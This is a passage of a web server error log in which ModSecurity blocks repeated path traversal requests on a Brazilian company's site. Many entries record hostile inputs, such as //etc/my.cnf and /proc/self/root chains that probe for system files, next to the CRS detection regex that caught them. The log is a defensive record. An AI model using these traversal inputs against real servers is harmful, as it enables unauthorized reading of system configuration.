"PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08hTJ3M9BSuKP7CAYwLAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:40.373633 2026] [:error] [pid 7893:tid 140411557287680] [client 216.73.216.191:47722] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08iBCii7xarUs8iHZ5PgAAAhY"]
[Fri Mar 20 09:24:41.454496 2026] [mime_magic:error] [pid 10189:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:47814] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:24:41.727495 2026] [:error] [pid 11642:tid 140411632822016] [client 216.73.216.191:47844] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08ibninkcc-iUj5ApvnwAAA40"]
[Fri Mar 20 09:24:41.796311 2026] [:error] [pid 7893:tid 140411632822016] [client 216.73.216.191:47850] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08iRCii7xarUs8iHZ5QgAAAg0"]
[Fri Mar 20 09:24:42.303614 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:47888] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08ita6ubjKNq_cu4bo-AAAA0Q"]
[Fri Mar 20 09:24:44.404367 2026] [:error] [pid 11167:tid 140411607643904] [client 216.73.216.191:48084] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08jPHIg5MgXLBnicMIWgAAAdA"]
[Fri Mar 20 09:24:45.436288 2026] [:error] [pid 10189:tid 140411616036608] [client 216.73.216.191:48158] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08jTJ3M9BSuKP7CAYwPAAAAI8"]
[Fri Mar 20 09:24:46.207209 2026] [:error] [pid 10189:tid 140411716749056] [client 216.73.216.191:48222] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08jjJ3M9BSuKP7CAYwQAAAAIM"]
[Fri Mar 20 09:24:47.527494 2026] [:error] [pid 9818:tid 140411590858496] [client 216.73.216.191:48320] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08j11pVZ5mVmJwsFNCnAAAAFI"]
[Fri Mar 20 09:24:47.667543 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:48334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08j_XLqtnMIWvjpaKrhwAAAok"]
[Fri Mar 20 09:24:48.874714 2026] [:error] [pid 7235:tid 140411607643904] [client 216.73.216.191:48244] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08kPqxLDW4GITHUkT7FgAAARA"]
[Fri Mar 20 09:24:51.677761 2026] [mime_magic:error] [pid 11167:tid 140411733534464] (70014)End of file found: [client 57.141.18.46:48596] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:24:54.315184 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:55872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08lvXLqtnMIWvjpaKrkAAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:56.987171 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:55322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08mF1pVZ5mVmJwsFNCqwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:24:57.487187 2026] [:error] [pid 7235:tid 140411548894976] [client 216.73.216.191:49070] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08mfqxLDW4GITHUkT7IgAAARc"]
[Fri Mar 20 09:24:58.002987 2026] [:error] [pid 21219:tid 140411565680384] [client 216.73.216.191:49102] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08mvXLqtnMIWvjpaKrkgAAApU"]
[Fri Mar 20 09:25:04.097986 2026] [:error] [pid 21219:tid 140411725141760] [client 216.73.216.191:49274] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08nfXLqtnMIWvjpaKrlQAAAoI"]
[Fri Mar 20 09:25:04.109363 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:55336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08nuoXxyEfFpUF8f-SWAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:07.830499 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.244.43:41242] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab08o11pVZ5mVmJwsFNCrwAAAFc"]
[Fri Mar 20 09:25:08.334220 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:49440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08pF1pVZ5mVmJwsFNCsAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:10.459701 2026] [:error] [pid 7893:tid 140411674785536] [client 216.73.216.191:49692] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08phCii7xarUs8iHZ5XgAAAgg"]
[Fri Mar 20 09:25:14.035504 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:54184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08qrninkcc-iUj5ApvuAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:16.649330 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:54192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08rPHIg5MgXLBnicMIgAAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:18.151506 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:54196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08rta6ubjKNq_cu4bpQwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:25:21.527365 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:50378] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08sda6ubjKNq_cu4bpSgAAA1U"]
[Fri Mar 20 09:25:23.095160 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:50402] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08shCii7xarUs8iHZ5cAAAAgI"]
[Fri Mar 20 09:25:23.098501 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:50398] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08sda6ubjKNq_cu4bpTwAAA0I"]
[Fri Mar 20 09:25:27.907822 2026] [:error] [pid 15826:tid 140411574073088] [client 216.73.216.191:50714] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab08t-oXxyEfFpUF8f-SiAAAAVQ"]
